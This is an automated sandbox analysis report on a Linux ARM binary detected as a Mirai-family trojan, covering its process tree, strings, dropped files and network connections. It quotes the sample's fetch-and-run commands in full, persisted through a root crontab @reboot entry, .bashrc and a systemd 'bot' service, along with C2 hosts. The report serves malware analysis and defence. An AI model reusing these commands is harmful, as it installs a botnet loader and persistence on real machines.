Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
armv4l.elf

Overview

General Information

Sample name:armv4l.elf
Analysis ID:1558943
MD5:b1de6afb7105e0da26b1a219f9f5031a
SHA1:e1b3179ec8a6646d27e522414487497720a273a8
SHA256:ad9ce965f543f4b0e2993d08f40bcb29753c9020b4093f4db2f894745c53c9ea
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1558943
Start date and time:2024-11-20 01:00:14 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 58s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:armv4l.elf
Detection:MAL
Classification:mal68.troj.linELF@0/4@3/0
Command:/tmp/armv4l.elf
PID:5616
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • armv4l.elf (PID: 5616, Parent: 5536, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/armv4l.elf
    • armv4l.elf New Fork (PID: 5618, Parent: 5616)
      • sh (PID: 5628, Parent: 5618, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5634, Parent: 5628)
          • sh New Fork (PID: 5636, Parent: 5634)
          • crontab (PID: 5636, Parent: 5634, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5637, Parent: 5634)
          • chmod (PID: 5637, Parent: 5634, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5640, Parent: 5634)
          • sh (PID: 5640, Parent: 5634, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5641, Parent: 5634)
          • curl (PID: 5641, Parent: 5634, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          • sh New Fork (PID: 5644, Parent: 5634)
          • chmod (PID: 5644, Parent: 5634, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 5634, Parent: 5628, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 5635, Parent: 5628)
        • crontab (PID: 5635, Parent: 5628, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • sh (PID: 5645, Parent: 5618, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 5647, Parent: 5645)
        • systemctl (PID: 5647, Parent: 5645, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 5649, Parent: 5648)
  • snapd-env-generator (PID: 5649, Parent: 5648, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: armv4l.elfAvira: detected
Source: armv4l.elfReversingLabs: Detection: 34%
Source: armv4l.elfString: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv4l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: armv4l.elfString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: armv4l.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: /bin/curl (PID: 5641)Reads hosts file: /etc/hostsJump to behavior
Source: /tmp/armv4l.elf (PID: 5616)Socket: 127.0.0.1:4161Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: host.zopz-api.com
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.csTjpj.22.drString found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.drString found in binary or memory: http://serverip/bins/bins.sh;
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv4l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal68.troj.linELF@0/4@3/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5636)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5635)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/armv4l.elf (PID: 5618)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 5635)File: /var/spool/cron/crontabs/tmp.csTjpjJump to behavior
Source: /usr/bin/crontab (PID: 5635)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/armv4l.elf (PID: 5618)File: /root/.bashrcJump to behavior
Source: /bin/curl (PID: 5641)Directory: /root/.curlrcJump to behavior
Source: /tmp/armv4l.elf (PID: 5628)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
Source: /tmp/armv4l.elf (PID: 5645)Shell command executed: sh -c "/bin/systemctl enable bot"Jump to behavior
Source: /bin/sh (PID: 5637)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5644)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5647)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
Source: /tmp/armv4l.elf (PID: 5616)Queries kernel information via 'uname': Jump to behavior
Source: /bin/curl (PID: 5641)Queries kernel information via 'uname': Jump to behavior
Source: armv4l.elf, 5616.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp, armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/armv4l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv4l.elf
Source: armv4l.elf, 5616.1.000056538988c000.00005653899df000.rw-.sdmp, armv4l.elf, 5618.1.000056538988c000.00005653899df000.rw-.sdmpBinary or memory string: SV!/etc/qemu-binfmt/arm
Source: armv4l.elf, 5616.1.000056538988c000.00005653899df000.rw-.sdmp, armv4l.elf, 5618.1.000056538988c000.00005653899df000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: armv4l.elf, 5616.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp, armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
File and Directory Permissions Modification
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scheduled Task/Job
1
Scheduled Task/Job
Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Scripting
Login HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558943 Sample: armv4l.elf Startdate: 20/11/2024 Architecture: LINUX Score: 68 47 host.zopz-api.com 172.111.38.48, 1290, 40008 INCERO-HVVCUS Reserved 2->47 49 daisy.ubuntu.com 2->49 53 Antivirus / Scanner detection for submitted sample 2->53 55 Multi AV Scanner detection for submitted file 2->55 10 armv4l.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 armv4l.elf 10->14         started        file6 45 /root/.bashrc, ASCII 14->45 dropped 61 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 14->61 18 armv4l.elf sh 14->18         started        20 armv4l.elf sh 14->20         started        22 armv4l.elf 14->22         started        24 2 other processes 14->24 signatures7 process8 process9 26 sh crontab 18->26         started        30 sh sh 18->30         started        32 sh systemctl 20->32         started        file10 43 /var/spool/cron/crontabs/tmp.csTjpj, ASCII 26->43 dropped 57 Sample tries to persist itself using cron 26->57 59 Executes the "crontab" command typically for achieving persistence 26->59 34 sh crontab 30->34         started        37 sh chmod 30->37         started        39 sh sh 30->39         started        41 2 other processes 30->41 signatures11 process12 signatures13 51 Executes the "crontab" command typically for achieving persistence 34->51

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
armv4l.elf34%ReversingLabsLinux.Trojan.Mirai
armv4l.elf100%AviraEXP/ELF.Mirai.W
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    host.zopz-api.com
    172.111.38.48
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://serverip/bins/bins.shtmp.csTjpj.22.drfalse
        high
        http://serverip/bins/bins.sh;bot.service.13.drfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          172.111.38.48
          host.zopz-api.comReserved
          54540INCERO-HVVCUSfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          172.111.38.48mipsel.elfGet hashmaliciousUnknownBrowse
            i686.elfGet hashmaliciousUnknownBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              daisy.ubuntu.comkjsusa6.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25
              mmb9.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.24
              mmb2.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.25
              mmb1.elfGet hashmaliciousMirai, OkiruBrowse
              • 162.213.35.24
              owari.m68k.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.25
              owari.arm6.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.25
              owari.arm7.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              owari.mips.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.24
              host.zopz-api.commipsel.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              i686.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              INCERO-HVVCUSmipsel.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              i686.elfGet hashmaliciousUnknownBrowse
              • 172.111.38.48
              cIhVfU4Bus.elfGet hashmaliciousMiraiBrowse
              • 172.110.25.149
              b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
              • 23.29.124.10
              https://auth-start-treizor.github.io/Get hashmaliciousUnknownBrowse
              • 23.227.176.186
              https://ambassadorlimo.comGet hashmaliciousUnknownBrowse
              • 198.99.138.98
              https://ambassadorlimo.com/Get hashmaliciousUnknownBrowse
              • 198.99.138.98
              https://link.edgepilot.com/s/58d339fb/mi_L0_elk0K48SZfFk6Q5A?u=http://www.ambassadorlimo.com/Get hashmaliciousUnknownBrowse
              • 198.99.138.98
              http://www.philmauer.com/Get hashmaliciousUnknownBrowse
              • 172.111.52.90
              http://loveevamk.lifeGet hashmaliciousUnknownBrowse
              • 172.111.38.73
              No context
              No context
              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              File Type:ASCII text
              Category:dropped
              Size (bytes):76
              Entropy (8bit):3.7627880354948586
              Encrypted:false
              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
              MD5:D86A1F5765F37989EB0EC3837AD13ECC
              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
              Process:/tmp/armv4l.elf
              File Type:ASCII text
              Category:dropped
              Size (bytes):178
              Entropy (8bit):4.358630015292201
              Encrypted:false
              SSDEEP:3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
              MD5:C3685F292213652676F734AB36C060EE
              SHA1:1D05F7F6302EC60E7990DE4BBE9180C149EFC731
              SHA-256:D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
              SHA-512:7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview:./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".
              Process:/tmp/armv4l.elf
              File Type:ASCII text
              Category:dropped
              Size (bytes):356
              Entropy (8bit):4.9110117370593995
              Encrypted:false
              SSDEEP:6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
              MD5:F03C70CD4C61A1852F9E19B8FB0D639C
              SHA1:A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
              SHA-256:AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
              SHA-512:6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
              Process:/usr/bin/crontab
              File Type:ASCII text
              Category:dropped
              Size (bytes):235
              Entropy (8bit):5.096705576725245
              Encrypted:false
              SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvjBMvZHGMQ5UYLtCFt3HY8jsHB:8QjHig8iJeHLUHY8mB
              MD5:43B042637824995BF6446D27C2D1BEFB
              SHA1:5EC9ADA45F79649C5F42C6A1B7A0605BE6B0E23B
              SHA-256:903D4D9E2F342C3CC58C045B32EF3D739291C60A63B579D97B43AA8D2F69FAAE
              SHA-512:06B67CE306A0E91106B2D4E266A566AF0B5AC229127A723E101357A9D994265F4D1311385FA3315945E29D0D367A2FDC02E6B7BE344D2C9D5026909120BE3B41
              Malicious:true
              Reputation:low
              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 18:01:23 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.
              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
              Entropy (8bit):6.108229534208223
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:armv4l.elf
              File size:78'696 bytes
              MD5:b1de6afb7105e0da26b1a219f9f5031a
              SHA1:e1b3179ec8a6646d27e522414487497720a273a8
              SHA256:ad9ce965f543f4b0e2993d08f40bcb29753c9020b4093f4db2f894745c53c9ea
              SHA512:8b0e05228979c21fe6a938e003bed521760b306860d12ccba026067511c9490ce752cb6c3232d506ebcb44cc502c0e69dd5ed260d7cc8c49b96c830e1dae7608
              SSDEEP:1536:lxu6Nt3LUDmK+Y104tirDuaXy7K41N/DAzdLvws/:lk6N9LUxti3FmK4n8tws/
              TLSH:F973F942BD819F03C5C222F6F7EF01893B156BB9D5EB3242E925BF9033868DB1967251
              File Content Preview:.ELF...a..........(.........4...`1......4. ...(.......................................... ... ... .......f..........Q.td..................................-...L."....@..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
              Machine:ARM
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:ARM - ABI
              ABI Version:0
              Entry Point Address:0x8190
              Flags:0x202
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:78176
              Section Header Size:40
              Number of Section Headers:13
              Header String Table Index:12
              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x80940x940x180x00x6AX004
              .textPROGBITS0x80b00xb00x103d80x00x6AX0016
              .finiPROGBITS0x184880x104880x140x00x6AX004
              .rodataPROGBITS0x1849c0x1049c0x17070x00x2A004
              .eh_framePROGBITS0x19ba40x11ba40x40x00x2A004
              .ctorsPROGBITS0x220000x120000x80x00x3WA004
              .dtorsPROGBITS0x220080x120080x80x00x3WA004
              .jcrPROGBITS0x220100x120100x40x00x3WA004
              .dataPROGBITS0x220140x120140x3940x00x3WA004
              .bssNOBITS0x223a80x123a80x630c0x00x3WA004
              .commentPROGBITS0x00x123a80xd600x00x0001
              .shstrtabSTRTAB0x00x131080x560x00x0001
              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x80000x80000x11ba80x11ba86.13030x5R E0x8000.init .text .fini .rodata .eh_frame
              LOAD0x120000x220000x220000x3a80x66b43.02120x6RW 0x8000.ctors .dtors .jcr .data .bss
              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
              TimestampSource PortDest PortSource IPDest IP
              Nov 20, 2024 01:01:23.469803095 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:23.474672079 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:23.474720001 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:23.479756117 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:23.484622955 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:23.948640108 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:23.948873043 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:28.680466890 CET4516053192.168.2.148.8.8.8
              Nov 20, 2024 01:01:28.685512066 CET53451608.8.8.8192.168.2.14
              Nov 20, 2024 01:01:28.685604095 CET4516053192.168.2.148.8.8.8
              Nov 20, 2024 01:01:28.685604095 CET4516053192.168.2.148.8.8.8
              Nov 20, 2024 01:01:28.685656071 CET4516053192.168.2.148.8.8.8
              Nov 20, 2024 01:01:28.690457106 CET53451608.8.8.8192.168.2.14
              Nov 20, 2024 01:01:28.690469027 CET53451608.8.8.8192.168.2.14
              Nov 20, 2024 01:01:28.949779987 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:28.949840069 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:28.949966908 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:28.954726934 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:29.129717112 CET53451608.8.8.8192.168.2.14
              Nov 20, 2024 01:01:29.130012989 CET4516053192.168.2.148.8.8.8
              Nov 20, 2024 01:01:29.262948990 CET53451608.8.8.8192.168.2.14
              Nov 20, 2024 01:01:29.263175011 CET4516053192.168.2.148.8.8.8
              Nov 20, 2024 01:01:31.130028963 CET53451608.8.8.8192.168.2.14
              Nov 20, 2024 01:01:31.130179882 CET4516053192.168.2.148.8.8.8
              Nov 20, 2024 01:01:31.135140896 CET53451608.8.8.8192.168.2.14
              Nov 20, 2024 01:01:34.836822033 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:34.836891890 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:34.836977959 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:34.837018013 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:34.837080956 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:34.837172985 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:34.837234974 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:34.837338924 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:34.837378025 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:34.841907024 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:34.842050076 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:34.846856117 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:38.951030970 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:38.951116085 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:38.951147079 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:38.956006050 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:38.956085920 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:38.960899115 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:43.951185942 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:43.951246023 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:43.951289892 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:43.956166983 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:43.956221104 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:43.961098909 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:48.951560974 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:48.951646090 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:48.951688051 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:48.956609011 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:48.956682920 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:48.961550951 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:53.952198029 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:53.952285051 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:53.957475901 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:53.957536936 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:53.962480068 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:58.952678919 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:58.952810049 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:58.957667112 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:01:58.957741976 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:01:58.962585926 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:03.953150034 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:03.953322887 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:03.958290100 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:03.958347082 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:03.963241100 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:08.954327106 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:08.954464912 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:08.959373951 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:08.959433079 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:08.964267969 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:13.954997063 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:13.955600977 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:13.961225986 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:13.961316109 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:13.966434956 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:18.954592943 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:18.954864025 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:18.959780931 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:18.959876060 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:18.964767933 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:23.955682039 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:23.955821991 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:23.960783005 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:23.960871935 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:23.965799093 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:28.956132889 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:28.956346989 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:28.961220980 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:28.961373091 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:28.966265917 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:33.957293034 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:33.957412004 CET400081290192.168.2.14172.111.38.48
